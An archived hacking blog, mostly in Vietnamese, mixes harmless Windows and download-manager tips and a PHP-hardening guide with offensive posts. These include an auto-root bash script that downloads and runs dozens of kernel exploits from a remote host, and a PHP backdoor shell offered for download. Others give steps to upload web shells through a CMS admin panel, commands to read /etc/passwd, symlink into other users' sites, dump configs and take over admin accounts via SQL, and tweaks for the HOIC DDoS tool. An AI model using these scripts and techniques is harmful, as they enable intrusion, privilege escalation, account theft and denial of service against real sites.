Monday, April 30, 2012

http://www.mediafire.com/?83m6n423zws9o#djh8h0y150m55
Chia sẻ cho ae newbie 1 kho tài liệu lập trình, local,...

Book+ shell+ video+ tools [Newbie]

By: MIN Software on: 5:51 AM

Saturday, April 28, 2012

Cách 1: (khá hữu dụng và áp dụng trên các WINDOWS hiện nay, Vista thì mình chưa dám làm)
Bạn có muốn khi khởi động window xẽ có lời chào bạn,điều đó rất vui,và còn làm cho nhiều người ngạc nhiên nữa chứ!
Trước tiên, bạn vào Start - Run. Gõ vào Regedit.exe. Sau đó bạn mở các khóa bằng cách nhấp vào dấu + theo các bước sau:

+ HKEY_LOCAL_MACHINE
+ Software
+ Microsoft
+ WindowsNT
+ Current version
+ Win logon
->Cây thư mục nè: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WindowsNT\ CurrentVersion\Winlogon.
Sau đó bạn nhấp phải chuột vào cửa sổ bên phải bất kỳ và sau đó  tạo New - String Value.

Sau khi bạn tao String xong và nhập vào tên LegalNoticeCaption . Sau khi tạo xong bạn nhấp đôi chuột trái vào string vừa tạo và nhập vào tên cửa sổ. Ví dụ như: Welcome, Hello,Chào pác!,Chào Em,Rất vui khi em đến nhà anh!!.v..v. (Tùy ý thích của từng người, xài dc Tiếng Việt--Unicode).

Sau đó bạn vẫn tạo thêm một String nữa và nhập vào tên sau đây LegalNoticeText Và cũng tương tự như bước trên và bạn có thể nhập vào nội dung mà bạn thích.

*LegalNoticeCaption (câu tiêu đề)
*LegalNoticeText (câu nội dung, dài hay ngằn cũng dc, nhìu thì hay)
Lưu ý: Làm thủ thuật này thì ko có ảnh hưởng đến “chất lượng” CPU nhưng khi làm thì có các vấn đề hay xả ra như: Máy báo lổi: The Registry Edittor connot rename ….. The specified value name already exists. Type another name and try again  là do 2 String chúng ta tạo và đổi tên thành LegalNoticeCaption LegalNoticeTex đã có sẵn mà chưa có dữ liệu thông tin. Cách giải quyết là tìm 2 String (tệp tin) đó và nhấp chuột để ghi lời chào.
Thủ thuật Winlogo này dc làm trongWINDOWSNT đó chứ ko phải trong WINDOWS đâu, coi chừng nhầm mà làm ko dc đó. Các bạn xem kỹ rồi lick nhá


Cách 2:(Cách này áp dụng cho các máy ko làm dc, và ko báo lỗi hay làm dc nhưng ko báo lời chào)
Nếu không được thì thử cách này nhé..!
Vào Start/Run, đánh lệnh gpedit.msc, Ok
Tìm đến khoá sau:
Computer Cònigurations/Windows Settings/Security Settings/Local Policies/Security Options.
Nhìn sang bên phải bạn tìm đến khoá 2 sau:
Message text for user attempting to log on (Câu Thông Báo) và
Message title for user attempting to log on (Câu Tiêu Đề)
Bạn nhấn đúp chuột lên 2 mục này và đánh các câu ưa thích vào (Có thể đánh được = tiếng việt có dấu (Unicode))

Nguồn: Ebook thủ thuật

Tạo lời chào khi khởi động Window (Trước Welcome)

By: MIN Software on: 6:55 AM

Friday, April 27, 2012


Using NetCat as a backdoor

By: MIN Software on: 4:09 AM

Netcat: Backdoor (Windows)

By: MIN Software on: 4:03 AM

Thursday, April 26, 2012

Hello Again,

Today I Have New Trick To Read passwd File.

1. We Know That This File Located In Etc Folder And The Easy Command To Read It Is cat /etc/passwd.

2. Some Times We Have A Problem To Access To This File Because Of The Security Of The Server Or The SafeMode Is On.

3.Don't Worry I Have Some Solutions ^_^

Some Commands To ByPass This Security :

awk -F: '{ print $1 }' /etc*/passwd | sort

or

awk -F: '{ print $ 1 "" $ 2 "" $ 3 "" $ 4 "" $ 5 "" $ 6 "" $ 7 "" }'

or

/etc*/passwd | sort

or

cd /etc; cat passwd

or

cat /etc/valiases/domain.tld

or

awk -F ":" '{print "user ****:" $ 1 "\ t \ tuid:" $ 3}' /etc/passwd

./Done

Bypass /etc/passwd File Read

By: MIN Software on: 8:59 AM
Tut bypass ACCESS DENIED  By [BYG] Kid

Link dowload :
http://www.mediafire.com/?0m6xxvthh08603a

TUT bypass ACCESS DENIED

By: MIN Software on: 8:54 AM

Wednesday, April 25, 2012









Nguồn Các Thành Viên Xgroup:
http://www.mediafire.com/?obqcq1tqomskc

Tổng Hợp Những Gì Cần Thiết Nhất Cho NewBie Từ Cơ Bản Đến Nâng Cao

By: MIN Software on: 6:08 AM

Monday, April 23, 2012

Có nhiều cách để ngăn cản việc chương trình Internet Download Manager “tài lanh” nhẩy ra download khi mình không muốn. Tùy theo nhu cầu mà bạn chọn một trong ba cách dưới đây (hướng dẫn dựa trên phiên bản portable IDM 5.12, tải tại http://tinyurl.com/pctips0745):
1. Bạn bấm nút Options trên thanh công cụ. Trong hộp thoại Internet Download Manager Configuration, bạn chọn thẻ General > bấm vào nút Keystại mục Customize keys to prevent or force download with IDM. Trong hộp thoại Using special keys, bạn đánh dấu chọn mục Use the following key[s] to prevent download with IDM for any links (chọn phím để ngăn IDM tiến hành download khi bấm link) rồi đánh dấu chọn phím Alt hay Shift, Ctrl tùy thích. Khi nào không muốn IDM nhảy ra thì bấm phím đó cùng lúc với bấm chuột vào vào link trong trang Web. Cách này rất tiện vì có thể linh động tùy trường hợp.
2. Cũng trong thẻ General, bạn có thể bỏ dấu chọn trước tên trình duyệt mà bạn không muốn cho IDM theo dõi việc bấm vào link (để nhảy ra download). Khi nào cần download thì bạn bấm phím phải vào link rồi chọn lịnh Download with IDM trong menu ngữ cảnh.
3. Trong hộp thoại Internet Download Manager Configuration, bạn chọn thẻ File types rồi bạn xóa các tên mở rộng của file mà bạn không muốn IDM tự động download trong khung start downloading the following file types (td: MP3,WMA,WMV).
Hoặc bấm nút Edit list nằm dưới mục Don’t start download automatically from the following addresses để bổ sung địa chỉ trang Web mà bạn chỉ muốn thưởng thức trực tuyến vào danh sách cấm không cho IDM download.
 

Không cho IDM tự động download

By: MIN Software on: 8:45 AM

Sunday, April 22, 2012

This is our first release to so many more program's yet to come and released on MadSpot.Net.



I am very fortunate to release the Php Backdoor created by Our Team Member, Mr Ikram Ali,
I would like to say, he has done an amazing job, He made it very useful for penetration testers to penetrate there servers for multiples ways of vulnerabilities. He made the Backdoor with multiple functions.
I would like to congratulate Mr Ikram Ali for his wonderful coding and design for the MadSpot Security Team Shell.
There are multiple functions in this Php Shell including to work  both on Windows and Linux servers.
We highly hope that our users like it and please Join us on Our Facebook Page.
We need new ideas from users, We want you to let us know what kind of tools and help they needed from us.
We will try our best to guide you and help you for all kind of users from average to advanced users relating to penetration testing and programing.
We are group of very small Programers and Security Experts from Pakistan.
Please download the shell from the link below:-
We added some cool wallpapers of MadSpot.Net in it also.
Have fun and best of Luck.
Download Link:-  Click here to download from Mediafire.com
Password:- http://madspot.net
Like Our Facebook Page:- http://www.facebook.com/pages/MadSpot-Security-Team/224278670998389
Join MadSpot.Net on Facebook:- http://www.facebook.com/MadSpot.Net
Join MadSpot.Net Facebook Group:- http://www.facebook.com/groups/251614228257895/ 

MadSpot Security Team Shell V 1.0

By: MIN Software on: 3:24 AM
A key-logger, or system monitor is a small program that stores all keystokes typed by user on effective systeam. Key logger can sent those logs by FTP and emails. Some keylogger has can do lot more than just recording keystokes.

    Now the main reason for this artical is how to protect your system form the effect of keylogger. Keylogger came in form of any file, mostly in .exe file. Keep that in mind that attacker of the file will use social engginering to force you to click on it. You need to be really carefull while reciveing files and attached files form any unknown and know person.


    The most common reason, which resulted to effective my keylogger is untrustworthy websites. Thoses site contain key-logger code in them that exploit your browser and cause it to quitly install a keylogger program without you permission. It is not complusery that only trustworthy sites can cause you effective my keylogger there is possiblity that hacker hack any good sites and use it for his own purpose.


Following are some tips which help you defend against keylogger:

  • Always use good and updated Antivirus.
  • Install firewall. And Don't remain of windows default firewall. Be-leave me it really sucks. Kespersky and comodo filewall works good and it free.
  • Keep your system updated.
  • Use antikeylogger like  Web Watcher and etc. http://www.filehippo.com/software/antimalware/ this will also help you alot.
  • Use Antivirus spyware program and install it with updated version.
  • Use the updated browser for surfing. 
  • Always download file with care. If any antivirus give any kind of alert, take serous action about it. And catch that program before it make any damage in your system.

How TO Protect Your System From Keyloggers

By: MIN Software on: 3:22 AM

Saturday, April 21, 2012

Victim: PA VietNam

Tool :
=============
NetCat

=============
Exploit:
Giải nén => up lên server => chmod +x cho file run.sh => chạy file
=============
locus shell : backdoor host
=============
TUT GetRoot PA VietNam

GetRoot PA VietNam

By: MIN Software on: 8:59 PM
Đây là các exploit kernel từng phiên bản đã biên dịch gcc rồi... chỉ cần download up lên + chmod là chạy.

Phòng tránh link die download attack:

#!/bin/sh
# Auto Rooting Exploiter Script
# _____ __ __________ __
# / _ \ __ ___/ |_ ____ \______ \ ____ _____/ |_
# / /_\ \| | \ __\/ _ \ | _// _ \ / _ \ __\
#/ | \ | /| | ( <_> ) | | ( <_> | <_> ) |
#\____|__ /____/ |__| \____/ |____|_ /\____/ \____/|__|
# \/ \/
#To start script "./autoroot.sh"
#Author :- Ne0-h4ck3r
#Love To :- sec4ever.com
#Greetz to :- TiGER-M@ATE,ApOcalYpse,The Injector,N4ss1m,H311-C0d3,b0x,FoX-HaCkEr,darkl00k,Goog!l-warrr!03,m4ck,br0wn-sug4r
#Email ID :- localhost_21@hotmail.com



function checkroot {
if [ "$(id -u)" = "0" ]; then
cd ..;
rm -r sec4;
echo "Got root";
exit;
else
echo "No good. Still "`whoami`;
echo "";
fi;
}

uname -a;
mkdir sec4;
cd sec4;
echo "Checking if already root...";
checkroot;

wget http://dl.dropbox.com/u/59362344/new/1-2;
chmod 0777 1-2;
./1-2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/1-3;
chmod 0777 1-3;
./1-3;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/1-4;
chmod 0777 1-4;
./1-4;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2;
chmod 0777 2;
./2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2-1;
chmod 0777 2-1;
./2-1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2-6-32-46-2011;
chmod 0777 2-6-32-46-2011;
./2-6-32-46-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2-6-37;
chmod 0777 2-6-37;
./2-6-37;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-6-x86-2011;
chmod 0777 2.6.18-6-x86-2011;
./2.6.18-6-x86-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-164-2010;
chmod 0777 2.6.18-164-2010;
./2.6.18-164-2010;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-194;
chmod 0777 2.6.18-194;
./2.6.18-194;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-194.1-2010;
chmod 0777 2.6.18-194.1-2010;
./2.6.18-194.1-2010;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/acid;
chmod 0777 acid;
./acid;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-194.2-2010;
chmod 0777 2.6.18-194.2-2010;
./2=2.6.18-194.2-2010;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.18-274-2011;
chmod 0777 2.6.18-274-2011;
./2.6.18-274-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...12.1.el5-2012;
chmod 0777 2.6.18-374.12.1.el5-2012;
./2.6.18-374.12.1.el5-2012;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.28-2011;
chmod 0777 2.6.28-2011;
./2.6.28-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.32-46.1.BHsmp;
chmod 0777 2.6.32-46.1.BHsmp;
./2.6.32-46.1.BHsmp;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.33;
chmod 0777 2.6.33;
./2.6.33;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.33-2011;
chmod 0777 2.6.33-2011;
./2.6.33-2011;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...-2011Exploit1;
chmod 0777 2.6.34-2011Exploit1;
./2.6.34-2011Exploit1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...-2011Exploit2;
chmod 0777 2.6.34-2011Exploit2;
./2.6.34-2011Exploit2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.37;
chmod 0777 2.6.37;
./2.6.37;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.6.37-rc2;
chmod 0777 2.6.37-rc2;
./2.6.37-rc2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/2.34-2011Exploit1;
chmod 0777 2.34-2011Exploit1;
./2.34-2011Exploit1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/3;
chmod 0777 3;
./3;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/4;
chmod 0777 4;
./4;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/5;
chmod 0777 5;
./5;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/6;
chmod 0777 6;
./6;
checkroot;


wget http://dl.dropbox.com/u/59362344/new/7;
chmod 0777 7;
./7;
checkroot;


wget http://dl.dropbox.com/u/59362344/new/7-2;
chmod 0777 7-2;
./7-2;
checkroot;


wget http://dl.dropbox.com/u/59362344/new/7x;
chmod 0777 7x;
./7x;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/8;
chmod 0777 8;
./8;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/9;
chmod 0777 9;
./9;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/10;
chmod 0777 10;
./10;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/11;
chmod 0777 11;
./11;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/13x;
chmod 0777 13x;
./13x;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/14;
????: Th3 0uTl4wS r3Fug3 http://board.th3-0utl4ws.com/showthread.php?t=24228
chmod 0777 14;
./14;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/15.sh;
chmod 0777 15.sh;
./15.sh;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/16;
chmod 0777 16;
./16;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/16-1;
chmod 0777 16-1;
./16-1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/18;
chmod 0777 18;
./18;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/18-5;
chmod 0777 18-5;
./18-5;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/31;
chmod 0777 31;
./31;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/36-rc1;
chmod 0777 36-rc1;
./36-rc1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/44;
chmod 0777 44;
./44;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/15150;
chmod 0777 15150;
./15150;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/15200;
chmod 0777 15200;
./15200;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/exp1;
chmod 0777 exp1;
./exp1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/exp2;
chmod 0777 exp2;
./exp2;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/exp3;
chmod 0777 exp3;
./exp3;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/exploit;
chmod 0777 exploit;
./exploit;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/full-nelson;
chmod 0777 full-nelson;
./full-nelson;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/gayros;
chmod 0777 gayros;
./gayros;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/lenis.sh;
chmod 0777 lenis.sh;
./lenis.sh;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...xploit-gayros;
chmod 0777 local-root-exploit-gayros;
./local-root-exploit-gayros;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/pwnkernel;
chmod 0777 pwnkernel;
./pwnkernel;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/root1;
chmod 0777 root1;
./root1;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/root.py;
chmod 0777 root.py;
./root.py;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/runx;
chmod 0777 runx;
./runx;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/tivoli;
chmod 0777 tivoli;
./tivoli;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/ubuntu;
chmod 0777 ubuntu;
./ubuntu;
checkroot;

wget http://dl.dropbox.com/u/59362344/new...-root-exploit;
????: Th3 0uTl4wS r3Fug3 http://board.th3-0utl4ws.com/showthread.php?t=24228
chmod 0777 vmsplice-local-root-exploit;
./vmsplice-local-root-exploit;
checkroot;

wget http://dl.dropbox.com/u/59362344/new/z1d-2011;
chmod 0777 z1d-2011;
./z1d-2011;
checkroot;

exploit.rar‎

New Autoroot for kernel update 2012 (private)

By: MIN Software on: 8:51 PM
1.MySQL có 2 loại
60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự
2.MD4 có 3 loại:
bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự
3.MD5 có tới 5 dạng:

0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự

3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự

DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự

$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự

$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.
4.MSCash
9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
5.SHA-1 có 2 loại:
7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự

Nhận dạng các loại mã hóa

By: MIN Software on: 8:38 PM
Link download:
http://www.mediafire.com/?tok0nel4cbygisv
Password:
juno_okyo
Phiên bản mới này của Anonymous 2012.
Hiệu quả nhưng chỉ dos 1 tí site chạy lại.
Chỉnh user agent thì sẽ hiệu quả hơn:

 
GenericBoost.hoic
edit cái poplute list
// populate list
useragents.Append "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
useragents.Append "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
useragents.Append "Googlebot/2.1 (+http://www.google.com/bot.html)"
useragents.Append "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)"
useragents.Append "Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Ddos h.o.i.c.2.1

By: MIN Software on: 8:34 PM

Sunday, April 15, 2012

Bước 1: Đăng nhập với quyền quản trị  
 




Bước 2: Upload Themes
Vào “Quản lý giao diên”  => “Cài đặt themes"
"
Chọn: “Cài đặt themes lên hệ thống
Nén gói themes cần upload dưới dạng zip rồi up lên. 
Lưu ý: Trong gói themes upload lên hãy chèn 1 con shell và nhơ đường dẫn của con shell đó, Ví dụ:
Soleil chèn 1 con shell byg.php trong thư mục images và có path là: /nuke/images/byg.php
Pass dai nén: soleil_vhb
Đây là các file và forder của themes được upload lên trong đó co con shell byg.php


Tiếp tục chọn “Kiểm Tra” và hoàn thành các bước cài đặt còn lại.
Bươc 3: Run Shell
Như đã nói ở trên shell byg.php được chèn vào có  path là: /nuke/images/byg.php
Nên, Link shell sẽ là:
 

Bài viết này soleil viết mục đich là tham khảo:
     -          Username và password có được do local attack
     -          Link shell đã được đặt pass kỹ càn nhằm tránh người ngoài vào phá hoại
     -           Các file, thư mục quan trong đã đươc soleil config  hết.
     -          Đã thông báo với bên lien quan ( Vì site lien quan đến GOV)

[TUT] - Upload Shell qua ACP của NukeViet

By: MIN Software on: 6:39 AM
1 cài câu lệnh phổ biến cho ae NB, và dể hiễu

PHP Code:
cat /etc/passwd liệt kê các user có trên server 
PHP Code:
dir /home/user/public_html/ : đi đến public_html của user 
PHP Code:
ln -/home/user/public_html/index.php hehe.txt ghi file index.php vào file hehe.txt trên thư mục mình đang dùng : ví dụ đang dùng http://abc.com/c99.php thì vào http://abc.com/hehe.txt 
Vậy muốn ghi con shell của mình vào host người khác thì làm sao ??
PHP Code:
ln -/home/user_của_mình/public_html/c99.php /home/user_của_victim/public_html/c99.php lựa chọn thư mục chmod 777 hay 755 mà có quyền ghi nhé 
_Nếu bị chmod ko cho ghi thì sao ??
=>Thì dir qua web nó rồi run command típ
_Nếu wa web nó ko run đc thì sao ?
=>thì xem web nó có forum hay cái gì đó ko mình úp shell thông qua lỗi ảnh hoặc úp wa forum
-vậy phải làm sao để xem đc file config để vào được database ?
PHP Code:
cat /home/user/public_html/forum/includes/config.php >> xem file config.php 
_Nếu ko xem được thì sao ??,diss các hàm và éo có symljnk ??
=> thì download website nó về mà ngâm cứu config
PHP Code:
tar -czf hehehe.tar.gz /home/user/public_html/forum
>> download nguyên cái forum
ko thì download cái config nó thôi.
PHP Code:
tar -czf config.tar.gz /home/user/public_html/forum/includes/config.php 
_Nếu lệnh zip ko được nữa thì sao ,config mã hóa thì sao
thì xem cách mã hóa
hiện tại có 2 cái dezend và base64_decode ,xem google thì bít
nếu zip ko đc chắc bó tay quá >> đỗi cách khác (nói lăng nhăng quá mình bỏ wa bước này )
Vậy nếu có user+pass+data mà đăng nhập ko được ,đăng nhập đc mà ko zip đc thì làm sào sữa đc mà vào admin úp shell trên forum ??
=>Con shell mình đang dùng ko phải là root nên rất hạn chế
1 vài lệnh cải thiện :
PHP Code:
chmod a+wxr file.php -rwxrwxrwx chmod a+drw file.php -rwxrwxrwx chmod -R a+rx thumuc >> giao quyen doc va vao ben trong thu muc,ke ca thu muc con 
chmod -R a+rw thumuc >> giao quyen doc va ghi...
chmod -R a+rwx thumuc >> quyen root
mkdir backup >> tạo thư mục backup
chmod 777 backup >> chmod nó thành 777 để mình zip data.zip lên
_Nếu ko chmod 777 được thì làm sao ?
=> tạo con chmod.php nội dung như sau:
Quote:
PHP Code:
<?php chmod("backup"0777); ?>
úp lên rồi run
http://abc.com/chmod.php

sau đó úp con dumper.php lên rồi điền info vào zip ,zip xong có thể về localhost chỉnh sữa rồi úp lên => backup thế là mình đã quản lí

-Cách này lằng nhằng quá ,data nó cả trăm M thì phiền ?

vậy thì dùng con c99.php ,vào chổ nào có user mà chỉnh sữa
ví dụ nó có bảng user bao gồm id và email ,....thì run command trên SQL của data là
PHP Code:
update user set email="hehehe@yahoo.com" where id=
nếu user admin nó có id là 1,đã thay thế = hehehe@yahoo.com
>> sau đó chơi quên mật khẩu gửi user+pass về email hehehe@yahoo.com

hoặc
Quote:
PHP Code:
update user set id ='6'where user='hehehe' 
>> set user hehehe lên thẳng admin (vào reg nick hehehe trước nhá)
hoặc
Quote:
PHP Code:
update user set passwd ="e10adc3949ba59abbe56e057f20f883e" where id=
>> e10adc3949ba59abbe56e057f20f883e = 123456 >> vào mà đăng nhập user=admin_của_nó ;pass =123456


mấy bước làm sao thì ae kím clip xem sẽ hiễu
>> up qua style hoặc plugin gì gì đó là đc thôi
Chơi thôi đừng quá hoại gì!

Các Câu Lệnh Sử dụng Shell và cách khắc phục sự cố không local được

By: MIN Software on: 6:29 AM
Hiện nay rất nhiều cách tao private sock như xài mocks, Tunnilier... Mỗi cách đều có ưu nhược điểm riêng. Đối với mocks thì rất dễ chết host, còn Tunnilier thì khỏi phải nói, hiẹn này đa só dân underground đều xài trình này, nhưng nhược điểm của trình này là chạy rất dich vụ nên tính ổn định thường không cao (?)

Không nói dài dòng, giờ đi thẳng o vấn đề. Hôm nay BMT sẽ giới thiệu cho các bạn cách tạo private socks với putty (only).

Có thể nhiều bạn đọc đến dòng này sẽ chê bai cách này là cũ, chúngta cũng đã đến biết cách tạo private socks sử dụng putty để loginshell, sau đó xài mocks để create socks. Nhưng ở đây BQT muốn nói làchỉ cần với putty là có thể tạo cho mình 1 con private socks chạy ổnđịnh và nhanh hơn nhiều so với Tunnilier.


ĐỌC TIẾP »

Cách tạo socks 4 + 5 với putty

By: MIN Software on: 6:19 AM

Saturday, April 14, 2012

This summary is not available. Please click here to view the post.

10 cách bảo mật cho vBB

By: MIN Software on: 8:39 PM
Bài này đc a Justom viết bên enhack
hum nay mình leech về để mọi người tham khảo thêm
10 lưu ý bảo mật dữ liệu cho website PHP sử dụng Shared hosting Linux Ngày nay các ứng dụng web với mã nguồn mở phát triển rất mạnh, trong đó đặc biệt phổ biến là PHP – MySQL. Nhưng công nghệ phát triển đồng thời kéo theo những “tin tặc” trẻ luôn muốn khẳng định mình sau khi xem những hướng dẫn tấn công, khai thác lỗi đầy rẫy trên các forum hacker. Vì thế bất kì một website nào cũng có khả năng bị tấn công bất cứ lúc nào, đặc biệt là các site cá nhân, tập thể vừa và nhỏ sẽ chọn giải pháp là thuê shared hosting trên một server. Vì các shared hosting ở cùng server nên độ riêng tư không cao, việc kiên cố hoá website trên shared hosting là rất cần thiết.

Shared hosting là gì ?

Ta vẫn quen gọi ngắn shared hosting là host, vì hầu hết các site đều thuê dịch vụ hosting để tiết kiệm chi phí, ngoại trừ một số site yêu cầu tài nguyên lớn và độ bảo mật cao mới sử dụng server riêng.

1. Phân quyền hợp lí

A. Tìm hiểu về chmod:

Là sự phân quyền truy cập vào một file hay một folder đối với các lớp người dùng giống như các thuộc tính dùng lệnh attrib trong DOS.
Các lớp người dùng gồm có: Owner – Group – World
  • Owner : người “sở hữu” host.
  • Group : là nhóm người dùng.
  • World : bất kì ai.
Các quyền khi chmod:
  • Read : đọc (r = 4)
  • Write : ghi (w = 2)
  • Execute : thực thi (x = 1)
VD: chmod 751 = rwxr-x--x

Cách chmod:
Ta có thể chmod file, folder bằng FTP hoặc cPanel. Sau đây là ví dụ dùng FTP (trong cPanel tương tự):
  • Dùng FTP client (ở đây tôi dùng FlashFXP) để connect FTP vào host.
  • Chuột phải lên các file, folder (giữ Ctrl và click để chọn nhiều file/folder rời rạc, hoặc Ctrl A để chọn hết), chọn CHMOD, ta sẽ có hộp thoại như hình:
  • Nếu bạn muốn chmod thư mục và file khác nhau thì đánh dấu chọn Separately set File and Folder attributes.




B. CHMOD thế nào để an toàn:

Cách CHMOD tối ưu nhất :
  • chmod 404 (chỉ cho phép đọc) tất cả các file.
  • chmod 101 (chỉ cho thực thi) tất cả các folder.
  • chmod 501 thư mục /public_html/
Các cách chmod trên đều không cho write, do đó bố cục được bảo toàn, đồng thời không thể xem cấu trúc site, thư mục, file. Có thể nói đó là các chmod an toàn nhất mà ứng dụng web như diễn đàn, site nhạc, tin tức có thể hoạt động ổn định.

Tuy nhiên không phải server nào cũng cho phép bạn chmod như vậy, nếu bạn dùng FTP không thể chmod được như vậy, thì hãy chmod như sau:
  • chmod 704 (chỉ cho phép đọc) tất cả các file.
  • chmod 701 (chỉ cho thực thi) tất cả các folder.
Lưu ý: Phiên bản cPanel 11 có File Manager V3, có thể dùng để chmod hàng loạt rất tốt và có thể chmod được file 404, folder 101.

2. “Ẩn mình” – Hide path

Khi đăng kí hosting, domain chính thường được trỏ vào ngay trong thư mục /public_html/, điều này giúp “kẻ tấn công” dễ dàng mò đến file quan trọng của website (vd như file config.php của các forum chẳng hạn), và khi đó thông tin đăng nhập quản lí cơ sở dữ liệu của website đã bị kẻ xấu lấy mất. Điều tệ hại gì sẽ xảy ra ?

Để khắc phục điểm này, ta nên yêu cầu bên cung cấp hosting tạo host không có domain (tên miền) chính và để ta tự gắn vào bằng chức năng add-on domain. Khi add domain sẽ có chỗ để bạn nhập đường dẫn đến thư mục mà domain sau khi gắn thành công sẽ trỏ vào như hình2.
VD: /public_html/foder1/folder2/folder3/forum/



Sau khi bạn bấm add các thư mục folder1, folder2, …, forum sẽ được tự động tạo ra. Và bây giờ bạn áp dụng cách chmod ở trên để chmod các thư mục folder1, folder2 … để giấu đường dẫn của site trên server.

3. Không hiển thị lỗi nếu phát sinh

Khi có lỗi phát sinh, PHP sẽ hiện thông báo ra trình duyệt và chỉ rõ lỗi ở file nào, dòng nào và đường dẫn của file, vì thế điều này rất nguy hiểm.

Để che lỗi, bạn tạo một file php.ini với nội dung như sau:
display_errors = Off
log_errors = On
Sau đó upload lên thư mục chứa website.

Gợi ý: bạn nên up file php.ini trên vào các thư mục mà người dùng sẽ truy cập bằng trình duyệt, thường là thư mục chứa website, thư mục quản trị, thư mục của user …

4. Bật safe-mode (chế độ an toàn) và vô hiệu các hàm nguy hiểm

Thêm hoặc edit 2 dòng sau trong nội dung file php.ini
disable_functions = passthru, system, shell_exec, exec, dir, readfile, virtual, proc_terminate
safe-mode = on
Lưu ý: bạn có thể bỏ bớt các hàm trong danh sách hàm bị vô hiệu nếu hàm đó cần cho website của bạn hoạt động.

5. Phân quyền account truy cập cơ sở dữ liệu MySQL

Khi bạn tạo user truy cập vào database, bạn cần lưu ý:
  • Không dùng user và pass của host làm user của database.
  • Không cấp quyền DROP như hình 3.



6. Tránh chmod 777 cho folder/file

Đôi khi bạn gặp một số yêu cầu chmod 777 cho file/folder để thực hiện công việc gì đó, bạn hãy chú ý chmod lại sau khi công việc đã được thực hiện xong.

Bạn có thể tham khảo thêm tại đây: http://www.enhack.net/xforce/showthread.php?t=6

7. Mã hoá các file chứa thông tin nhạy cảm

Các file nhạy cảm chứa các thông tin kết nối cơ sở dữ liệu như config.php với các kiểu mã hoá như base64 của PHP hoặc mã hoá dùng phần mềm zendguard của www.zend.com.

Nếu mã hoá base64 PHP thì các bạn có thể dùng google để tìm với từ khoá base64 encode
